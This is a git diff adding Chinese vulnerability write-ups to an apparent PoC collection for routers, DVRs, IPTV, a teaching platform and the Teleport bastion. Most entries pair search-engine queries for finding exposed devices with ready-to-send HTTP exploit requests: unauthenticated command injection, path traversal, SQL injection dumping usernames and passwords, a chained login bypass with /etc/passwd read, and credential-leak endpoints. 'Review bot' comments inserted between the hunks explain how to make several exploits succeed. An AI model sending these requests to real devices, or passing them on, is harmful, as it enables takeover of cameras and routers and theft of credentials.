@@ -0,0 +1,27 @@ +# TBK DVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721) + +**一、漏洞简介** + TBK DVR硬盘录像机是专业的视频监控设备,支持高清录制、远程监控和智能分析等功能,为各种场所提供稳定可靠的安全监控解决方案。该产品device.rsp 接口处存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令,写入后门文件,获取录像机shell权限。 +**二、影响版本** +TBK DVR-4104 + +TBK DVR-4216 +**三、资产测绘** +●fofa `"Location: /login.rsp"`![1715357452117-0503040a-73a2-4977-b9b6-9a4cacebc1c9.png](./img/nL3f78cvd3-lc5rB/1715357452117-0503040a-73a2-4977-b9b6-9a4cacebc1c9-380767.png) +**四、漏洞复现** + +```yaml +GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Cookie: uid=1 +``` + +![1715357380708-66eba540-fa97-4730-8826-a3a88312db04.png](./img/nL3f78cvd3-lc5rB/1715357380708-66eba540-fa97-4730-8826-a3a88312db04-601760.png) + + + + + +> 更新: 2024-05-13 11:48:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sg4z4l6xsevsochr> \ No newline at end of file diff --git a/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md b/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md new file mode 100644 index 0000000..47e90eb --- /dev/null +++ b/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md 
@@ -0,0 +1,33 @@ + +## TOTOLINK A3700R命令执行漏洞CVE-2023-46574 +TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞,攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。 + +## 影响版本: +``` +TOTOLINK A3700R v9.1.2u.6165_20211012 +``` + + +## poc +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Host: 192.168.122.15 +Content-Length: 73 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.122.15 +Referer: http://192.168.122.15/basic/index.html?time=1697964093345 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: SESSION_ID=2:1697964047:2 +Connection: close + + +{"topicurl":"UploadFirmwareFile","FileName":";ls;"} +``` +![image](https://github.com/wy876/POC/assets/139549762/37a0b1f8-101e-4642-b9fa-3fda6f31f079) + +## 来源 +- https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md diff --git a/TOTOLINK存在泄漏账号密码泄露漏洞.md b/TOTOLINK存在泄漏账号密码泄露漏洞.md new file mode 100644 index 0000000..10ee303 --- /dev/null +++ b/TOTOLINK存在泄漏账号密码泄露漏洞.md @@ -0,0 +1,25 @@ +# TOTOLINK存在泄漏账号密码泄露漏洞 + +# 一、漏洞简介 +TOTOLINK存在泄漏账号密码泄露漏洞 + +# 二、影响版本 ++ TOTOLINK + +# 三、资产测绘 ++ fofa`"TOTOLINK"` ++ 特征 + +![1722616502911-6584fab6-2545-4c39-afba-b538b3d04fea.png](./img/un9vgxuKVLRXxw_9/1722616502911-6584fab6-2545-4c39-afba-b538b3d04fea-761611.png) + +# 四、漏洞复现 +```http +/cgi-bin/ExportSettings.sh +``` + +![1722616415949-91023cc8-2ab9-4181-9d4b-a413b02d7045.png](./img/un9vgxuKVLRXxw_9/1722616415949-91023cc8-2ab9-4181-9d4b-a413b02d7045-360549.png) + + + +> 更新: 2024-08-12 17:15:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dkxfq1s0ol3ebges> \ No newline at end of file diff --git a/TOTOLINK远程代码执行漏洞(CVE-2024-51228).md b/TOTOLINK远程代码执行漏洞(CVE-2024-51228).md new file mode 100644 index 0000000..abb7636 --- /dev/null 
+++ b/TOTOLINK远程代码执行漏洞(CVE-2024-51228).md @@ -0,0 +1,32 @@ +# TOTOLINK远程代码执行漏洞(CVE-2024-51228) + +TOTOLINK远程代码执行漏洞(CVE-2024-51228) + +## 影响版本 + +- TOTOLINK-CX-A3002RU-V1.0.4-B20171106.1512 +- TOTOLINK-CX-N150RT-V2.1.6-B20171121.1002 +- TOTOLINK-CX-N300RT-V2.1.6-B20170724.1420 +- TOTOLINK-CX-N300RT-V2.1.8-B20171113.1408 +- TOTOLINK-CX-N300RT-V2.1.8-B20191010.1107 +- TOTOLINK-CX-N302RE-V2.0.2-B20170511.1523 + +## poc + +``` +POST /boafrm/formSysCmd HTTP/1.1 +Host: {Target IP}:{Target Port} +User-Agent: curl/7.81.0 +Accept: */* +Content-Length: <length> +Content-Type: application/x-www-form-urlencoded + +sysCmd={shell_cmd} +``` + + + +## 漏洞来源 + +- https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities +- https://xz.aliyun.com/t/16707 \ No newline at end of file diff --git a/TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md b/TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md new file mode 100644 index 0000000..f90f62b --- /dev/null +++ b/TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md 
@@ -0,0 +1,88 @@ +## TP-LINKTL-WR940N 命令执行漏洞(CVE-2023-33538) + +``` +The PoC of TL-WR940NV4 is as follows: +GET +/JFYRUKOAPAQZRKOC/userRpm/WlanNetworkRpm.htm?ssid1=TP-LINK_000012||reboot;&ssid2= +TP-LINK_0000_2&ssid3=TP-LINK_0000_3&ssid4=TP-LINK_0000_4®ion=101&band=0&mode=6 +&chanWidth=2&channel=15&rate=83&ap=1&broadcast=2&brlssid=&brlbssid=&addrType=1&key +type=1&wepindex=1&authtype=1&keytext=&Save=Save HTTP/1.1 +Host: 127.0.0.1:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://127.0.0.1:8081/JFYRUKOAPAQZRKOC/userRpm/WlanNetworkRpm.htm +Cookie: +Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3 +D +Upgrade-Insecure-Requests: 1 + + +The PoC of TL-WR940NV2 is as follows: +GET +/UJOGPJXBZUFEBUDB/userRpm/WlanNetworkRpm.htm?ssid1=;reboot;&ssid2=TP-LINK_0000_2& +ssid3=TP-LINK_0000_3&ssid4=TP-LINK_0000_4®ion=101&band=0&mode=5&chanWidth=1&c +hannel=9&rate=59&ap=1&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex =1&authtype=1&keytext=&Save=Save HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/WlanNetworkRpm.htm +Cookie: +Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3 +D +Upgrade-Insecure-Requests: 1 + + +The PoC of TL-WR841N V8 is as follows: +GET +/userRpm/WlanNetworkRpm.htm?ssid1=a;reboot&ssid2=TP-LINK_000000_2&ssi +d3=TP-LINK_000000_3&ssid4=TP-LINK_000000_4®ion=101&band=0&mode=3&c 
+hanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&add +rType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save HTTP/1.1 +Host: 0.0.0.0:49168 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 +Firefox/91.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*; +q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Authorization: Basic YWRtaW46YWRtaW4= +Connection: close +Referer: http://0.0.0.0:49168/userRpm/WlanNetworkRpm.htm +Cookie: Authorization= +Upgrade-Insecure-Requests: 1 + + +The PoC of TL-WR841N V10 is as follows: +GET +/GWIDNCGBKQNKXJXB/userRpm/WlanNetworkRpm.htm?ssid1=a;reboot;&ssid2=TP +-LINK_0000_2&ssid3=TP-LINK_0000_3&ssid4=TP-LINK_0000_4®ion=101&ban +d=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&b +rlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Sav +e HTTP/1.1 +Host: 127.0.0.1:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) +Gecko/20100101 Firefox/109.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imag +e/webp,*/*;q=0.8 +Accept-Language: +zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://127.0.0.1:8081/GWIDNCGBKQNKXJXB/userRpm/WlanNetworkRpm.htm +Cookie: +Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDF +mYzM%3D +Upgrade-Insecure-Requests: 1 + +``` diff --git a/TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md b/TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md new file mode 100644 index 0000000..7b76376 --- /dev/null +++ b/TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md 
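Review bot: all four request lines contain `®ion=101` where `&region=101` was collapsed by HTML-entity decoding of `&reg`, so none of the PoCs reproduce as pasted; restore `&region=101` in each. Every request also carries `Cookie: Authorization=Basic%20YWRtaW46...` (the TL-WR841N V8 one sends `Authorization: Basic YWRtaW46YWRtaW4=`), i.e. these are authenticated requests, yet the entry has none of the 漏洞简介/影响版本/资产测绘 sections the other files use and never says that admin credentials are a precondition. In the TL-WR940NV2 block the path token `/UJOGPJXBZUFEBUDB/` differs from the one in its own Referer (`/KMODQNKANSQJBYFA/`), so at least one is stale; explain where that segment comes from. The text `The PoC of TL-WR940NV4 is as follows:` is copied from an external write-up; add the source URL.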
@@ -0,0 +1,34 @@ +# TVT数码科技 NVMS-1000 路径遍历漏洞(CVE-2019-20085) + +# 一、漏洞简介 +TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件。 + +# 二、影响版本 ++ TVT NVMS-1000 + + +# 三、资产测绘 ++ fofa`app="TVT-NVMS-1000"` ++ 特征 + +![1700225511766-2bbf4f4e-08c7-44c3-89a3-c132169c3127.png](./img/Yw6sGgPk7TOHxl5U/1700225511766-2bbf4f4e-08c7-44c3-89a3-c132169c3127-078553.png) + +# 四、漏洞复现 +```plain +GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: dataPort=6063 +Upgrade-Insecure-Requests: 1 +``` + +![1700225536790-2040e948-45dc-49ff-a5c2-8d01291eefc6.png](./img/Yw6sGgPk7TOHxl5U/1700225536790-2040e948-45dc-49ff-a5c2-8d01291eefc6-317687.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rpuprdcoqll62nfc> \ No newline at end of file diff --git a/TamronOSIPTV系统ping存在命令执行漏洞.md b/TamronOSIPTV系统ping存在命令执行漏洞.md new file mode 100644 index 0000000..193dd52 --- /dev/null +++ b/TamronOSIPTV系统ping存在命令执行漏洞.md 
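Review bot: the request line `GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1` only works if the `/../` sequences reach the server un-normalised, which browsers and most HTTP libraries will not do; state that the request has to be sent raw (Burp Repeater, or `curl --path-as-is`). The target file is Windows-specific; say whether NVMS-1000 runs only on Windows, so readers know `win.ini` is deliberate and not a placeholder. The 漏洞简介 sentence repeats `TVT数码科技 TVT NVMS-1000` twice in a row; tighten it.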
@@ -0,0 +1,31 @@ +# TamronOS IPTV系统ping存在命令执行漏洞 + +# 一、漏洞简介 +TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案。系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。TamronOS IPTV系统ping存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ TamronOS IPTV系统 + +# 三、资产测绘 ++ fofa`app="TamronOS-IPTV系统"` ++ 特征 + +![1706860491374-8545916f-3d24-4853-b41f-e8eff2b2af16.png](./img/tmaUZyNyQBoQjl11/1706860491374-8545916f-3d24-4853-b41f-e8eff2b2af16-092046.png) + +# 四、漏洞复现 +```plain +POST /api/ping?count=5&host=;whoami; HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 0 +Connection: close + +``` + + ![1706860532468-6f287a9a-0ce8-4de9-8388-66f83d562db2.png](./img/tmaUZyNyQBoQjl11/1706860532468-6f287a9a-0ce8-4de9-8388-66f83d562db2-533809.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy6y35t0g2nad6dw> \ No newline at end of file diff --git a/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md b/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md new file mode 100644 index 0000000..644e0ed --- /dev/null +++ b/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md 
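Review bot: the `Host:` header in the PoC is empty and the query string embeds a literal `;` (`host=;whoami;`); fill in the `xx.xx.xx.xx` placeholder used elsewhere and say whether the `;` is sent as-is or as `%3B`, since some clients and servers treat it as a parameter separator. The only success indicator is the screenshot; state in text that the output of `whoami` appears in the response body.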
@@ -0,0 +1,23 @@ +# Teaching在线教学平台getDictItemsByTable存在sql注入漏洞 + +Teaching 在线教学平台 <= v2.7版本存在SQL注入漏洞,攻击者利用此漏洞可以获取系统敏感数据 + +## fofa + +```javascript +icon_hash="1778610975" +``` + +## poc + +```javascript +GET /api/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/username,password%20'/x.js HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![null](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411012002071.png) \ No newline at end of file diff --git a/Teleport堡垒机do-login任意用户登录漏洞.md b/Teleport堡垒机do-login任意用户登录漏洞.md new file mode 100644 index 0000000..1a16d9b --- /dev/null +++ b/Teleport堡垒机do-login任意用户登录漏洞.md 
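Review bot: both fences are tagged ```javascript although they hold a FOFA query and a raw HTTP request; use `plain`/`http` as the other entries do, and fill in the empty `Host:`. The path `getDictItemsByTable/'%20from%20sys_user/username,password%20'/x.js` carries the injected `from sys_user` clause and the `username,password` column list, but the text only says 'SQL注入'; one sentence explaining that the table and columns are part of the injected query would tell readers why the response contains credentials. The entry also lacks the 漏洞简介/资产测绘 structure of the surrounding files and has no source link.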
@@ -0,0 +1,91 @@ +# Teleport堡垒机 do-login 任意用户登录漏洞 + +# 一、漏洞简介 +Teleport堡垒机是一款简单易用的开源堡垒机系统,具有小巧、易用的特点,支持RDP/SSH/SFTP/Telnet协议的远程连接和审计管理。Teleport堡垒机存在任意用户登录漏洞,攻击者通过漏洞可以获取业务后台权限。 + +# 二、影响版本 ++ Teleport堡垒机<= 20220817 + + +# 三、资产测绘 ++ hunter`app.name="Teleport 堡垒机系统"` ++ 特征 + +![1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218.png](./img/W8kMt7wlSfRQcUAD/1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218-962775.png) + +# 四、漏洞复现 +1. 获取验证码 + +```plain +GET /auth/captcha?h=36&rnd=0.39124018049760567 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: image/avif,image/webp,*/* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 +``` + +![1700224435510-cba34aea-f31f-4e71-9451-e269543ab40d.png](./img/W8kMt7wlSfRQcUAD/1700224435510-cba34aea-f31f-4e71-9451-e269543ab40d-773404.png) + +2. 使用上一步的`cookie`和获取到的验证码对红框中的参数进行相应替换,校验验证码 + +```plain +POST /auth/verify-captcha HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 37 +Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 + +args={"captcha":"ckpa"} +``` + +![1700224521182-4598afce-46ee-488a-b40a-b37cb99f9605.png](./img/W8kMt7wlSfRQcUAD/1700224521182-4598afce-46ee-488a-b40a-b37cb99f9605-298334.png) + +3. 使用校验后的验证码和`cookie`对红框中的参数进行相应替换,当响应`code`为`0`时表示存在漏洞! 
+ +```plain +POST /auth/do-login HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 94 + +args={"type":2,"username":"admin","password":null,"captcha":"ckpa","oath":"","remember":false} +``` + +![1700224596713-4717833e-361d-45ae-9429-ebbe5555683c.png](./img/W8kMt7wlSfRQcUAD/1700224596713-4717833e-361d-45ae-9429-ebbe5555683c-262748.png) + +4. 使用上一步的`cookie`对红框中的参数进行相应替换,登录系统,获取管理员权限 + +```plain +GET /dashboard HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 +``` + +![1700224741128-1ec98d01-7787-4beb-8659-da182c4bd023.png](./img/W8kMt7wlSfRQcUAD/1700224741128-1ec98d01-7787-4beb-8659-da182c4bd023-330070.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/od1gvmdxp2ns8ze9> \ No newline at end of file diff --git a/Teleport堡垒机get-file后台任意文件读取漏洞.md b/Teleport堡垒机get-file后台任意文件读取漏洞.md new file mode 100644 index 0000000..993bd1d --- /dev/null +++ b/Teleport堡垒机get-file后台任意文件读取漏洞.md 
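Review bot: in step 2 `Content-Length: 37` does not match the 23-byte body `args={"captcha":"ckpa"}` (37 is the length of that body with braces, quotes and colon percent-encoded), while step 3's `Content-Length: 94` does match its body; a length longer than the body makes the server wait or reject the request, so either show the URL-encoded body or correct the header. Step 1 already sends `Cookie: _sid=tp_1700221267_fbf3ff64ee297b12` without saying where the session id comes from; add the initial request that issues it. Steps 2 to 4 say to replace "红框中的参数", which exists only in the screenshots; name the parameters in text (the `_sid` cookie and the `captcha` value). Step 3 submits `"password":null` with `"type":2` and `"username":"admin"`, and the title promises 任意用户登录; say whether any existing username works and that the null password is what makes it a bypass, rather than leaving that to be inferred from the body.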
@@ -0,0 +1,40 @@ +# Teleport堡垒机 get-file 后台任意文件读取漏洞 + +# 一、漏洞简介 +Teleport堡垒机 get-file接口存在后台任意文件读取漏洞,攻击者利用任意用户登录漏洞后可以获取后台权限,再进一步利用任意文件读取获取服务器上的敏感文件 + +# 二、影响版本 ++ Teleport堡垒机<= 20220817 + + +# 三、资产测绘 ++ hunter`app.name="Teleport 堡垒机系统"` ++ 特征 + +![1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218.png](./img/wf_kz4gZxf1izLnh/1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218-967661.png) + +# 四、漏洞复现 +1. 通过`Teleport堡垒机 do-login 任意用户登录漏洞`登录后台,获取管理员cookie + +![1700225092406-56c1fcf6-9f0d-49f2-83f2-7d97ab0f1928.png](./img/wf_kz4gZxf1izLnh/1700225092406-56c1fcf6-9f0d-49f2-83f2-7d97ab0f1928-923223.png) + +2. 通过上一步获取到的cookie读取服务器上的文件 + +```plain +GET /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 +Upgrade-Insecure-Requests: 1 +``` + +![1700225157574-3c40beac-b489-43ea-b047-ac449a073872.png](./img/wf_kz4gZxf1izLnh/1700225157574-3c40beac-b489-43ea-b047-ac449a073872-489991.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wg3n45g9dgsgstm6> \ No newline at end of file diff --git a/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md b/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md new file mode 100644 index 0000000..dc55338 --- /dev/null +++ b/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md 
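Review bot: `GET /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0` has four parameters besides `f` and the text explains none of them; say whether `rid` must reference an existing audit record and whether `type=rdp`, `act=read` and `offset=0` are fixed, otherwise a reader whose first try fails has nothing to vary. The prerequisite is stated only as `登录后台,获取管理员cookie` with a screenshot; say in text that the `_sid` from the do-login entry is reused unchanged (the PoC shows the same `tp_1700221267_fbf3ff64ee297b12`).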
@@ -0,0 +1,32 @@ +# Telesquare SDT-CW3B1无线路由器admin.cgi 远程命令执行漏洞(CVE-2021-46422) + +# 一、漏洞简介 +Telesquare SDT-CW3B1是韩国Telesquare公司的无线路由器产品。Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。 + +# 二、影响版本 ++ Telesquare SDT-CW3B1 1.1.0 + +# 三、资产测绘 ++ hunter`app.name=="Telesquare Router"` ++ 特征 + +![1700233053166-8eb3438f-a051-4482-9c4d-133f3bf80241.png](./img/hUm6GNLeu2yN1SN-/1700233053166-8eb3438f-a051-4482-9c4d-133f3bf80241-391808.png) + +# 四、漏洞复现 +```plain +GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1700235255810-240921a9-b67b-4b8f-bfbc-20a922f14f97.png](./img/hUm6GNLeu2yN1SN-/1700235255810-240921a9-b67b-4b8f-bfbc-20a922f14f97-240162.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qig0nr6ohmhnx304> \ No newline at end of file diff --git a/TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md b/TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md new file mode 100644 index 0000000..fc60814 --- /dev/null +++ b/TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md 
@@ -0,0 +1,29 @@ +# Telesquare TLR-2005Ksh 路由器 getUsernamePassword 信息泄露漏洞 + +# 一、漏洞简介 +Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器。Telesquare TLR-2005Ksh存在安全漏洞,攻击者可通过未授权getUsernamePassword获取用户名密码等敏感信息。 + +# 二、影响版本 ++ Telesquare Tlr-2005Ksh + +# 三、资产测绘 ++ hunter`web.title="TLR-2005KSH"||banner="TLR-2005KSH login:"` ++ 特征 + +![1700496629079-11703d7f-49e5-4047-bb1c-b189cacaf8bb.png](./img/AwpEpB3xYB_xa3gz/1700496629079-11703d7f-49e5-4047-bb1c-b189cacaf8bb-310968.png) + +# 四、漏洞复现 +```plain +/cgi-bin/admin.cgi?Command=getUsernamePassword +``` + +![1700496653815-05ae5b82-3d65-4580-be00-b9fd1c8cee07.png](./img/AwpEpB3xYB_xa3gz/1700496653815-05ae5b82-3d65-4580-be00-b9fd1c8cee07-960383.png) + +使用账户密码成果登录后台 + +![1700496675659-d3ed50e9-aec5-4f26-9e2e-ae504baf99f3.png](./img/AwpEpB3xYB_xa3gz/1700496675659-d3ed50e9-aec5-4f26-9e2e-ae504baf99f3-709363.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/awpgpcgce8hdzmr4> \ No newline at end of file diff --git a/Tenda路由器DownloadCfg信息泄露漏洞.md b/Tenda路由器DownloadCfg信息泄露漏洞.md new file mode 100644 index 0000000..d4a53e4 --- /dev/null +++ b/Tenda路由器DownloadCfg信息泄露漏洞.md 
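Review bot: typo in the last prose line, `使用账户密码成果登录后台` should read `成功`; the product is written `TLR-2005Ksh` in the title and `Tlr-2005Ksh` in the body and 影响版本, pick one. The PoC is a bare path `/cgi-bin/admin.cgi?Command=getUsernamePassword` where the sibling entries give a full request; at least state the method and that no cookie or auth header is sent, since that is the 未授权 claim made in the 漏洞简介.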
